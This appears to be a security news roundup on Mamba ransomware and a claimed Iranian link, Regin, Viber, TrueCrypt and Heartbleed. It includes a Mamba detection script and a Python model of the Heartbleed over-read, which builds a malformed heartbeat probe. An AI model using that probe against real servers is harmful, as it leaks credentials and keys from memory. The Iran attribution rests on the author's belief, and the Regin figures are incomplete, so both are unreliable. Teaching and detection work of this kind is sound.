Are Iranian hackers involved in using the “Mamba” ransomware (or possibly behind it)? It is unclear, but an article in November by Brian Krebs indicates there could be a connection.
What is Mamba?
According to Sophos, the Mamba ransomware scrambles every disk sector, including the Master File Table (MFT), the operating system, all applications, files and personal data. Mamba installs the DiskCryptor Full Disk Encryption (FDE) tool (this type of software asks for a password at boot, then decrypts every sector as it is read and encrypts every sector as it is written).
The infection vector Mamba uses is not known exactly, but it probably relies on social engineering in the form of an email link for a user to click on.
If a user does cause the Mamba ransomware to be downloaded and run, then on a Windows system they would see the User Account Control (UAC) prompt appear asking for permission to install MAMBA.EXE (!). What happens next, if the software is allowed to install, is:
- Mamba installs itself as a Windows service (called DefragmentationService) using the local SYSTEM privileges.
- The computer then reboots.
- After the reboot, Mamba installs DiskCryptor in the directory C:\DC22.
- At this stage the user can still recover the computer, because the encryption is not yet complete: the file log_file.txt in that directory contains the password in plaintext, and it can be used with the Decrypt option of the DCRYPT utility. However, if the computer is allowed to reboot again before that is done, the disk will be encrypted and the user has no way to learn the password.
On older Windows systems using a Master Boot Record (MBR) on the hard drive, you will see a ransom message similar to the one the Petya ransomware displays; on newer Windows systems, you won't see the message. In both cases, your only option is to wipe the hard drive; all data is gone.
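The window for recovery described above (DiskCryptor staged in C:\DC22 with the password still sitting in log_file.txt, before the second reboot) is worth checking for programmatically. The following is an added example in Python, not code from the page or from Sophos: it parses the output of Windows' `sc query` for the DefragmentationService service, looks for the DiskCryptor directory and its log file, and tells the responder whether a reboot is still survivable. The indicator names come from the write-up above; the layout of log_file.txt is not described there, so the script reports every non-empty line of it rather than guessing which one is the password (an assumption, labelled in the code).

```python
import re
import subprocess
import sys
from pathlib import Path

# Indicators quoted in the write-up above.
SERVICE_NAME = "DefragmentationService"
DISKCRYPTOR_DIR = r"C:\DC22"
PASSWORD_LOG = "log_file.txt"

# Constructed sample of `sc query type= service state= all` output, used only
# to show the parser's input shape; a real run reads it from sc.exe.
SAMPLE_SC_OUTPUT = """
SERVICE_NAME: Dhcp
        DISPLAY_NAME: DHCP Client
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 4  RUNNING

SERVICE_NAME: DefragmentationService
        DISPLAY_NAME: DefragmentationService
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
"""


def parse_sc_query(output: str) -> set:
    """Service names from `sc query` output; every entry starts with a
    'SERVICE_NAME: <name>' line."""
    return set(re.findall(r"^SERVICE_NAME:\s*(\S+)", output, re.MULTILINE))


def password_candidates(log_text: str) -> list:
    """Non-empty lines of log_file.txt. Assumption: the plaintext password is
    one of these lines; the exact file layout is not documented above."""
    return [line.strip() for line in log_text.splitlines() if line.strip()]


def assess(service_names, dc_dir=DISKCRYPTOR_DIR) -> dict:
    """Combine the indicators into a stage so the responder knows whether the
    password is still recoverable. dc_dir may point into a mounted image."""
    dc_dir = Path(dc_dir)
    log = dc_dir / PASSWORD_LOG
    found = {
        "service": SERVICE_NAME in service_names,
        "diskcryptor_dir": dc_dir.is_dir(),
        "password_candidates": (
            password_candidates(log.read_text(errors="replace")) if log.is_file() else []
        ),
    }
    if found["password_candidates"]:
        found["stage"] = "DiskCryptor staged, password still on disk: copy log_file.txt and do NOT reboot"
    elif found["service"] or found["diskcryptor_dir"]:
        found["stage"] = "Mamba present, password not recovered: do NOT reboot, image the disk first"
    else:
        found["stage"] = "no Mamba indicators"
    return found


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("run on the suspect Windows host, or call assess() with the path of a mounted image")
    # `sc query` needs the space after each '=' in its arguments.
    sc_out = subprocess.run(["sc", "query", "type=", "service", "state=", "all"],
                            capture_output=True, text=True, check=False).stdout
    for key, value in assess(parse_sc_query(sc_out)).items():
        print(f"{key}: {value}")
```

Run it from an elevated prompt on the suspect host as soon as the UAC prompt for MAMBA.EXE has been accepted; if the stage line says the password is still on disk, copy log_file.txt off the machine before anything else happens to it.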
The link with Iran
The blog of Brian Krebs (krebsonsecurity.com) shows that Iranians may have used Mamba against targets, including the San Francisco Municipal Transportation Agency (SFMTA). Fare station terminals displayed the message, “You are Hacked. ALL Data Encrypted.” The message stated that the key to decrypt the computers could be obtained by contacting the email address firstname.lastname@example.org
According to Krebs, the email account email@example.com was hacked by another hacker, who found that the same credentials worked for the cryptom2016@yandex email account. A server identified as being used by the owner of the cryptom2016 account had been scanning the Internet for various vulnerabilities, including in Oracle products, especially a “Weblogic unserialize exploit” and the Primavera project portfolio management software.
The server used to launch the Oracle vulnerability scans kept detailed logs of the date, time and Internet address of each login. A review of the more than 300 Internet addresses used to administer the server revealed that it had been controlled almost exclusively from Internet addresses in Iran.
The attack server logs also included the web links or IP addresses of each victim server, the hacked credentials, and notes the attacker had made next to each victim. The notes appeared to be transliterated Farsi…
User account names on the attack server held other clues of Iranian involvement, such as “Alireza” and “Mokhi.” Alireza may refer to Ali Reza, the seventh descendant of the prophet Muhammad. However, these are common names in and around Iran and could also indicate neighbouring countries of origin (such names are also popular in Turkey and the Arab world).
I would say, knowing what my country is capable of, that the Iranian state or Iranian cyber criminals ARE involved in using Mamba ransomware to extort money to further other cyber activities.
Symantec has revealed details about malware called “Regin”. It is a multi-stage attack framework that can be adapted easily to gather different types of data. According to Symantec this is not just screen grabs and password theft but something far more sophisticated: Symantec says it has identified dozens of different payloads available to Regin.
Once Regin has acquired data it encrypts it and then exfiltrates it. The stolen data may never be written to disk but may be sent back immediately, and the encryption means that security devices and software do not easily detect it.
Symantec describes how Regin uses special features to stay below the detection radar: “These include anti-forensics capabilities, a custom-built encrypted virtual file system (EVFS), and alternative encryption in the form of a variant of RC5, which isn’t commonly used. Regin uses multiple sophisticated means to covertly communicate with the attacker including via ICMP/ping, embedding commands in HTTP cookies, and custom TCP and UDP protocols.”
Regin has been found in 10 countries, and the targets appear to be key business sectors, individuals and small businesses. The breakdown by country that Symantec gives is:
- 28% Russian Federation
- 24% Saudi Arabia
Symantec describes Regin as follows: “In the world of malware threats, only a few examples can truly be considered groundbreaking and almost peerless. What we have seen in Regin is just such a class of malware.”
In September the Iranian newspaper Khabaronline claimed that Viber conversations can be monitored by Iranian government agencies.
In the piece entitled “Are Viber and WhatsApp really monitored easily?” the paper quoted a “computer expert” named Mani Haghshenas who stated: “It is possible for users to use Internet networks that shut down certain security protocols and disallow Viber to encrypt messages, and, ultimately, a network such as Viber would prefer to switch to a normal message transmission mode, in order to avoid permanent nonoperation of its application for some of its users. The country’s filtering systems may sometimes block and disable the security and communication protection capabilities of an application, and in order to continue its operation, such applications may automatically have to provide their services to their users without encryption, and such circumstances would assist the governments to control and tap communications.”
A Viber Company representative refuted these claims and told the International Campaign for Human Rights in Iran that the application communications are encrypted and as such it is not possible for third parties to monitor messages. “All text messages sent through Viber on its supported platforms are encrypted. Media messages, such as photos and videos, are encrypted on Viber for iOS, Viber for Android, Viber for Windows 8 and Viber for Windows Phone 8.”
One of the official web pages of the popular TrueCrypt encryption program now states that development has ended suddenly, and warns users of the decade-old tool that it is not safe to use.
“WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues,” text in red at the top of TrueCrypt page on SourceForge states. The page continues: “This page exists only to help migrate existing data encrypted by TrueCrypt. The development of TrueCrypt was ended in 5/2014 after Microsoft terminated support of Windows XP. Windows 8/7/Vista and later offer integrated support for encrypted disks and virtual disk images. Such integrated support is also available on other platforms. You should migrate any data encrypted by TrueCrypt to encrypted disks or virtual disk images supported on your platform.”
The Heartbleed bug is a serious vulnerability in the popular OpenSSL cryptographic software library. The weakness allows stealing information that is normally protected by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
The Heartbleed bug allows anyone on the Internet to read the memory of systems protected by vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of users, and the actual content. It allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users.
Although OpenSSL is very popular, there are other SSL/TLS implementations. In addition, some web sites use an earlier, unaffected version of OpenSSL (only the 1.0.1 branch up to 1.0.1f is affected; 1.0.1g fixes it, and the 0.9.8 and 1.0.0 branches never had the bug), and some were built with the heartbeat feature that is central to the vulnerability disabled.
Perfect forward secrecy (PFS), the practice of negotiating a fresh session key for every connection so that the server's long-term private key cannot be used to decrypt recorded traffic, reduces the potential damage but does not solve the problem. With PFS, an attacker who obtains the server's private key from memory cannot decrypt past sessions captured off the wire, but can still impersonate the server until the key is replaced and the old certificate revoked, and Heartbleed can also leak the session contents themselves straight from memory. While some tech giants like Google and Facebook have started to support PFS, not every company does.
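The over-read is easiest to understand by building the heartbeat message the bug mishandles. The following is an added example in Python, not code from the page or from OpenSSL: it encodes a TLS heartbeat request (RFC 6520) whose payload_length field claims more bytes than the message carries, models a vulnerable server that trusts that field next to a patched one that discards the request, and classifies the reply the way a scanner would. The two server functions are simplified models of the bug and of the fix, and the "heap" handed to them is constructed sample data, not anything captured from a real host.

```python
import struct

TLS_HEARTBEAT = 24          # record content type for heartbeat (RFC 6520)
TLS_ALERT = 21
HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = b"\x00" * 16      # RFC 6520 requires at least 16 bytes of padding


def build_heartbeat_request(claimed_len: int, payload: bytes = b"",
                            version: bytes = b"\x03\x02") -> bytes:
    """TLS record carrying a heartbeat request whose payload_length field is
    claimed_len regardless of how much payload is really present.
    claimed_len > len(payload) is the Heartbleed probe; equal is a normal ping."""
    body = bytes([HB_REQUEST]) + struct.pack("!H", claimed_len) + payload + PADDING
    return bytes([TLS_HEARTBEAT]) + version + struct.pack("!H", len(body)) + body


def vulnerable_server(record: bytes, heap_after: bytes) -> bytes:
    """Model of OpenSSL 1.0.1 to 1.0.1f: copies payload_length bytes starting
    at the payload, trusting the attacker-supplied length. heap_after stands
    in for whatever follows the request buffer in process memory."""
    body = record[5:]
    plen = struct.unpack("!H", body[1:3])[0]
    memory = body[3:] + heap_after           # payload, padding, then other data
    echoed = memory[:plen]
    resp = bytes([HB_RESPONSE]) + struct.pack("!H", plen) + echoed + PADDING
    return record[:3] + struct.pack("!H", len(resp)) + resp


def patched_server(record: bytes, heap_after: bytes) -> bytes:
    """Model of the 1.0.1g fix: the request is silently discarded unless
    type + length + payload + 16 bytes of padding fit inside the record."""
    body = record[5:]
    plen = struct.unpack("!H", body[1:3])[0]
    if 1 + 2 + plen + 16 > len(body):
        return b""
    resp = bytes([HB_RESPONSE]) + struct.pack("!H", plen) + body[3:3 + plen] + PADDING
    return record[:3] + struct.pack("!H", len(resp)) + resp


def check_response(data: bytes, sent_payload: bytes):
    """Classify a server's reply to a probe. Returns (verdict, leaked_bytes):
    anything echoed beyond what we actually sent came from the server's memory."""
    if len(data) < 5:
        return "no_response", b""          # silent discard: patched, or no heartbeat support
    ctype, rec_len = data[0], struct.unpack("!H", data[3:5])[0]
    if ctype == TLS_ALERT:
        return "alert", b""
    if ctype != TLS_HEARTBEAT:
        return "unexpected", b""
    body = data[5:5 + rec_len]
    if len(body) < 3 or body[0] != HB_RESPONSE:
        return "unexpected", b""
    plen = struct.unpack("!H", body[1:3])[0]
    echoed = body[3:3 + plen]
    if len(echoed) > len(sent_payload):
        return "vulnerable", echoed[len(sent_payload):]
    return "not_vulnerable", b""


if __name__ == "__main__":
    # Constructed stand-in for a neighbouring request buffer on the server heap.
    fake_heap = b"Cookie: session=9f3a1c7e; Authorization: Basic YWRtaW46aHVudGVyMg==" + b"\x00" * 64
    probe = build_heartbeat_request(claimed_len=64)
    for name, server in (("vulnerable", vulnerable_server), ("patched", patched_server)):
        verdict, leaked = check_response(server(probe, fake_heap), b"")
        print(f"{name:10s} -> {verdict}; {len(leaked)} bytes leaked: {leaked[16:56]!r}")
```

Against a live server the probe is only honoured after a ClientHello advertising the heartbeat extension and the server's ServerHello accepting it, so a real scanner wraps the request in that handshake; the first bytes leaked are the probe's own padding, which is why the demo prints from offset 16. A patched server's silence and a vulnerable server's 64-byte echo are the two outcomes a scanner distinguishes.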
How to avoid being affected:
- Do not log into accounts on affected sites until you are sure that the company has patched the problem.
- When you receive confirmation of a security patch, change the passwords of sensitive accounts.
- Monitor your account statements for the next few days in case any of your accounts was affected.